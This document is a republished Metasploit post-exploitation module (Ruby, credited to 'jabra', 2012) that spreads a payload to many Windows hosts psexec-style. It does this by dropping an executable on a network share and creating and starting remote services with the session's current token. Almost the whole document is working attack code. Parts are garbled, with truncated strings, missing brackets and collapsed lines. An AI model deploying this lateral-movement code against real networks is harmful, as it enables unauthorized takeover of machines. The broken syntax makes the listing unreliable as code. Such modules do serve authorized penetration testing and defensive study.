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Psexec Via Current User Token
来源:http://www.metasploit.com 作者:jabra 发布时间:2012-08-06  
# $Id$

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/services'

class Metasploit3 < Msf::Exploit::Local
  include Post::Windows::WindowsServices
  include Exploit::EXE
  include Post::File
  include Post::Common

  def initialize(info={})
    super( update_info( info,
        'Name'          => 'Psexec via Current User Token',
        'Description'   => %q{
          This module uploads an executable file to the victim system, creates
          a share containing that executable, creates a remote service on each
          target system using a UNC path to that file, and finally starts the

          The result is similar to psexec but with the added benefit of using
          the session's current authentication token instead of having to know
          a password or hash.
        'License'       => MSF_LICENSE,
        'Author'        => [
            'jabra'  # Brainstorming and help with original technique
        'References'    => [
            # same as for windows/smb/psexec
            [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
            [ 'OSVDB', '3106'],
            [ 'URL', 'http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx' ]
        'Version'       => '$Revision
, 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Universal', {} ] ], 'DefaultTarget' => 0 )) register_options([ OptString.new("INTERNAL_ADDRESS", [ false, "Session's internal address or hostname for the victims to grab the "+ "payload from (Default: detected)" ]), OptString.new("NAME", [ false, "Service name on each target in RHOSTS (Default: random)" ]), OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]), OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]), ]) end def exploit name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10) display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10) # XXX Find the domain controller #share_host = datastore["INTERNAL_ADDRESS"] || detect_address share_host = datastore["INTERNAL_ADDRESS"] || session.session_host print_status "Using #{share_host} as the internal address for victims to get the payload from" # Build a random name for the share and directory share_name = Rex::Text.rand_text_alphanumeric(8) drive = session.fs.file.expand_path("%SYSTEMDRIVE%") share_dir = "#{drive}\\#{share_name}" # Create them print_status("Creating share #{share_dir}") session.fs.dir.mkdir(share_dir) cmd_exec("net share #{share_name}=#{share_dir}") # Generate an executable from the shellcode and drop it in the share # directory filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe" payload_exe = generate_payload_exe_service( :servicename => name, # XXX Ghetto :arch => payload.send(:pinst).arch.first ) print_status("Dropping payload #{filename}") write_file("#{share_dir}\\#{filename}", payload_exe) service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}" begin Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server| begin print_status("#{server.ljust(16)} Creating service #{name}") # 3 is Manual startup. Should probably have constants for this junk service_create(name, display_name, service_executable, 3, server) # If everything went well, this will create a session. If not, it # might be permissions issues or possibly we failed to create the # service. print_status("#{server.ljust(16)} Starting the service") service_start(name, server) print_status("#{server.ljust(16)} Deleting the service") service_delete(name, server) rescue print_error("Exception running payload: #{$!.class} : #{$!}") print_error("#{server.ljust(16)} WARNING: May have failed to clean up!") print_error("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}") next end end ensure print_status("Deleting share #{share_name}") cmd_exec("net share #{share_name} /delete /y") print_status("Deleting files #{share_dir}") cmd_exec("cmd /c rmdir /q /s #{share_dir}") end end end
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